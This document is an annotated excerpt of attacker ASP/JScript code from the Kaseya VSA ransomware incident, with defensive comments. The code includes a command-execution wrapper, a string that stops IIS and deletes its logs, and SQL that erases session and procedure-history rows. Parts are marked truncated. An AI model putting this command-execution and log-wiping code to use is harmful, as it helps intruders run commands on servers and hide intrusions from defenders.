Fragments of Screenshot.jpg uploaded to the Kaseya VSA during the ransomware incident
// Fragment of a request handler: the enclosing scope is outside the capture.
// Removes the server-side file whose virtual path is held in pageFilterSQLFile
// (what that file held is not visible here).
fso.DeleteFile(Server.MapPath(pageFilterSQLFile))
// Three DELETEs issued as one batch against the VSA database: the admin's machine-filter
// rows, the logon row for the current session and the app session row — i.e. the
// session that performed the request is erased from the tables that record it.
// The values are spliced into the SQL by string concatenation, not bound as parameters.
// As captured the statements run together with no separator, and the trailing `\`
// line continuations are not valid JScript; both may be transcription artifacts.
// 128 is ADO's adExecuteNoRecords. Detection: userLogon/appSession rows disappearing
// outside the normal logout path.
dbConn.Execute( "DELETE FROM adminMachFil WHERE adminId="+sessionAdminId+""+ \
"DELETE FROM userLogon WHERE sessionId="+sessionId+""+\
"DELETE FROM appSession WHERE adminId="+sessionAdminId+"" ,0,128)
// The handler answers "0" to whoever called it.
Response.Write("0")
// Runs an OS command from inside the ASP page and returns its output.
//   c     - the command line to execute
//   sleep - optional delay in seconds; when > 0 a "ping 127.0.0.1 -n sleep+1" is
//           prepended as a delay before c runs (a common way to sleep in cmd.exe)
//   wait  - passed through as the COM object's wait flag and also used as getOutput;
//           defaults to 0 when null
// Returns the command output as reported by the COM object, or undefined when any
// step throws (the catch below swallows every error, so failures leave no trace here).
// "KComWExec.execCmd" appears to be a Kaseya-supplied COM component — confirm.
// Because Server.CreateObject runs inside the web server worker process, the
// detection point is a shell or ping child process spawned by that worker.
function cmdShell(c, sleep, wait) {
try {
if (wait == null) wait = 0
// Note `&` is the bitwise operator here, so `sleep > 0` is evaluated even when sleep is null.
if (sleep != null & sleep > 0) c = "ping 127.0.0.1 -n "+(sleep+1)+" > nul & "+c
var kComObj = Server.CreateObject("KComWExec.execCmd")
kComObj.wait = wait
// 360000 seconds — effectively no timeout.
kComObj.timeoutSec = 360000
kComObj.getOutput = wait
kComObj.execShellCmd(c)
return(kComObj.getCmdOutput())
}
catch(e){
}
}
// Physical path of the directory above the current page, with a trailing backslash.
var rp = Server.MapPath("..") + "\\"
// Anti-forensics command string (assigned as an implicit global; not invoked within
// this fragment). In order: stop IIS, recursively remove the IIS log directory,
// delete .log files under rp and the VSA web error log, restart IIS, then delete
// .log files across the system drive. The `\` continuations are as captured.
// Detection: the IIS stop/start pair and the resulting gap or missing files in
// %SystemDrive%\inetpub\logs and WebPages\Errors\webErrorLog.txt; the logs themselves
// cannot be relied on after this runs, so look at service-control and process events.
clearLogs = "%SystemDrive%\\Windows\\System32\\iisreset.exe /stop & "+ \
"rmdir /s /q %SystemDrive%\\inetpub\\logs & "+ \
"del /s /q /f "+rp+".log "+rp+".log. "+rp+"WebPages\\Errors\\webErrorLog.txt"+" & "+ \
"%SystemDrive%\\Windows\\System32\\iisreset.exe /start & "+ \
"del /s /q /f %SystemDrive%\\.log"
function SignProcedure() {
var httpRequest = Server.CreateObject( "Msxml2.ServerXMLHTTP.6.0" )
var url = "http://localhost/vsaPres/Web20/providers/SignProcedures.ashx"
var data = new String("{ \"ScriptIds\":[#ids#], \"AutoApprove " // THIS PORTION OF THE FILE IS TRUNCATED
// THIS PORTION OF THE FILE IS TRUNCATED
// [4344 bytes missing in capture file]
// THIS PORTION OF THE FILE IS TRUNCATED
.ySec += 1
cnt += 1
recSet.MoveNext()
}
// Statement run following the loop above; the loop's start and the SignProcedure
// body are truncated in the capture, as is the cmdShell call that follows this run.
// Signs the procedures referenced by scriptIds (SignProcedure's body is not visible).
SignProcedure()
recSet.Close()
// Creates an agent procedure under a benign-looking name; the name itself is a
// searchable indicator in the VSA procedure list.
procCreate("Archive and Purge Logs")
// Single step running a SQLCMD batch that deletes every row tied to scriptIds from
// the procedure tables, including scriptLog — removing the procedures and their
// execution history. Statements are again concatenated with no separator, and the
// closing `", 1)"` reads like the call's remaining arguments captured as part of the
// string; treat both as possible transcription artifacts. procCreate/procStep/procAssig
// are not defined in the visible fragment.
procStep(26, "2", "0", "+++SQLCMD:"+\
"DELETE FROM scriptAssignment WHERE scriptId IN ("+scriptIds+")"+\
"DELETE FROM scriptThenElse WHERE scriptId IN ("+scriptIds+")" +\
"DELETE FROM scriptIdTab WHERE scriptId IN ("+scriptIds+")" +\
"DELETE FROM scriptIf WHERE scriptId IN ("+scriptIds+")" +\
"DELETE FROM scriptLog WHERE scriptId IN ("+scriptIds+")" +\
", 1)"
// Assigns the cleanup procedure, scheduled diffSec + 1800 (30 minutes past diffSec,
// whose meaning is outside this fragment).
procAssig("123456789", diffSec + 1800)
SignProcedure()
cmdShell("del /q /f "+certFullSP, diffSec + 1800